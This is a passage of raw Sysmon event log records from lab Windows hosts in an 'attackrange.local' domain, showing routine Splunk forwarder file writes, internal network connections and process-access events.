Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0532A33808C419FBB608B30AF64869BF,SHA256=7D70D94CB821453CC829C219B3F4C71654D06C1620C9C0325E1AC55E3555F415,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083859Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:17.535{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\surveyor-20211004072618-037MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083862Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:18.614{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2705ED1B8A11F1655EAB39AA6F22E2DB,SHA256=643D059AA4276C7E807157AEBD7BA088B8A0A156DC53479F194A76C3297C6753,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108405Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:18.013{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9971CC30F6D3A6F39442AC944E59DD8,SHA256=473CA684D0C7202A4184B31E187109E5DF6DB56A47492B824F179B6AFAB021A7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083861Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:16.609{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50198-false10.0.1.12-8000- 23542300x800000000000000083864Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:19.614{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=987FC58F19E4AF6BA73C149E28DCF356,SHA256=E316301666976321B55AC81CC884EFA9465D6F1655CCF9CAF06A201D27E1EFE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108406Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:19.043{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BC0D388BD8627895BC6EE8278CD6A97,SHA256=15B22DA5F978C0037AF96FDE5A8CF3D2975BB4EAB0AB853C3C23AB548F01945E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083863Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:19.067{2FDD8D40-AC9A-615A-1200-00000000FD01}996NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=A78523FA1D9A6BB653066493601EC3D9,SHA256=BCACD06DEFC9E8241BD90245078D2B46EE5A83ADA5320A3FB95390F4E445EB94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083865Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:20.614{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=269CC008073E1BF1B5078960376EC6E1,SHA256=A974D390AD26FF898CDBC066D7F9B73D28DCDC00F6A0ECC01EC87E70F2765F87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108407Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:20.060{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F48CF6E6D2B480C95758D3BF1D0FA01E,SHA256=D0A22B982C8B5A23FED675A8FCAEC4D26E99ECD25FD769E8C15EF0FC53EAB2F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083866Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:21.614{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE58491813DEFB41421C93F627601A86,SHA256=0C7487DB25882EDAFCAAB65FA2895E79A78F2313303618001610200FAE9F7068,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108409Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:20.325{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51964-false10.0.1.12-8000- 23542300x8000000000000000108408Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:21.069{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=569D5B17F0B497E2F8D6D820D3C6317A,SHA256=C74883E1E674D1774AA5B7BA2805D7F07D4385A96980DE83507B5B584F602B4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083867Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:22.614{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17C0E3DF3E1F5554F6738B1DAB620E40,SHA256=36D4648B232679F87059A1576EC547E15E3E74659DFB7666ABB85FF6D9B6BE78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108410Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:22.089{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C63F488BDD713AAA823504DF2E5838C9,SHA256=BBE826414E8F168DCB12374A435F91487096BD741C0E0F25797BCF19A66CD8E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083868Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:23.614{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=115693937278A5AA937EB72BE20338FB,SHA256=7F9AFDD3278E46C675D91867E83EC620391C6BBBA17E08B2708D26FE4E4B6C09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108411Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:23.089{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C278A65B78A0E4DE3D423231EDD01D72,SHA256=F91B60F84ED11E331FFEA34A27A53C6BE1DF48C19470658908329DC44E0E2660,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083870Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:21.657{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50199-false10.0.1.12-8000- 23542300x800000000000000083869Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:24.614{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B414D1377CF725631C3773319B0CC595,SHA256=5976A121FC092B41DE15FE2B04BF93A3FF6FC9E32B2EF151883EFDD2030F75B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108412Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:24.104{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C2D87DE50177D5BCB591ABF66E76DF4,SHA256=0E64A83106C8A1C9CE306A62E0159E6DC46144E3621312914EE421EF8BBEAD64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083871Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:25.614{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58058B12BFED5EE12EA51952FA5F0069,SHA256=5E1A57D7B3DE507E09386812A9E86101363FD685A0D7A78EC0C42DDF40D582DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108413Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:25.104{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95FB8BDDCC5E3DE3AD81480AF83E04DE,SHA256=2FE6A4F225D9C759DF3527827ACA3128E68F1D552DEA158A493DBF8C3EEBA63A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083872Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:26.676{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1921F1BFE1E8D1FFB159EFB3F2EA9B29,SHA256=1AA35D833F7824EE97E1DC3EEA1BFDF0F372AA49694A74F08856E329F47B4607,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108414Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:26.150{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=976CD74F42F2CB61DE49162DAD606647,SHA256=2217530ACCCDFE8740017A8EEE8D05511534F7C6767CEDA95BACA264F652E56A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083873Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:27.817{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37CFE27F5EA3EE138E673BDD8D2E6F7B,SHA256=13F6D0B85600212607E5E9BDAAB82572EA3E009227DC55FD4A2B102858489163,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108416Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:26.312{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51965-false10.0.1.12-8000- 23542300x8000000000000000108415Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:27.167{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E48A71F8B500F30E3D603E8CFCC3FC5,SHA256=BF66F4012895B2DA1ADCA54641AB1D1B810E74242FC33F0252136E0042B992FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083874Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:28.817{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58F248075F5F760E8F0D78FAA5F7ACBE,SHA256=12D81EAB952EDC7FA3DB97AD1994AAA6C5CF5D557CD5926F51E6D8C16DE605C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108417Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:28.187{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A80905462D90FE31FE5153467D3717C,SHA256=24A3029CC36624E1741285487887B6DAFFE6F3032008EA25FD188D4F8E3403CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083877Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:29.911{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083876Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:29.833{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2CA5D4EB5A0787BB5AE91A3C8A0567A,SHA256=923746A24BCF656BB8D7BE5AC47A68E563AE1ADAAEA398D643B7A52B9C17AAEE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108422Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:29.664{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108421Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:29.664{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108420Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:29.664{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-ACA7-615A-1400-00000000FC01}940C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108419Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:29.664{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000108418Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:29.217{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FC84E126DDC698DCEAD71F0E62689FA,SHA256=E9E313BF78AB8427EE17181B21840D1A768E83A49EA3B47D612F6784FBA637F2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083875Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:26.782{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50200-false10.0.1.12-8000- 23542300x800000000000000083878Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:30.833{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACA3AA78ACA16C8850CB3C2D4BAD369D,SHA256=A0C86D511F1CBAA56FE26968DE3DFB0B82163D9A56ECED4039DB8152276088D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108423Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:30.232{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E612B02AE2A4CC46F267F72EE78BD7CD,SHA256=2E2D8FE45BC20AEB22284B68FF4CEC58168094D2E6822B7576EBCE4FCBA91C3D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083907Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.973{2FDD8D40-B58F-615A-A501-00000000FD01}38523380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000083906Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.942{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=697A576D2FF6DD1A47F472A40E22F618,SHA256=455D470580296B9ED59CCF129676121FD142C7F392BF6ED586AC47E09091FE40,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108425Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:31.384{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000108424Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:31.265{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DCE4E4453B7A35907A61CB28C95ED49,SHA256=A592B4AE33B9E931C26E6EA11B5950ADDF79A9CE6F709E5E30DC4739FC50008D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083905Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.817{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B58F-615A-A501-00000000FD01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083904Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.817{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083903Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.817{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083902Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:31.817{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083901Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 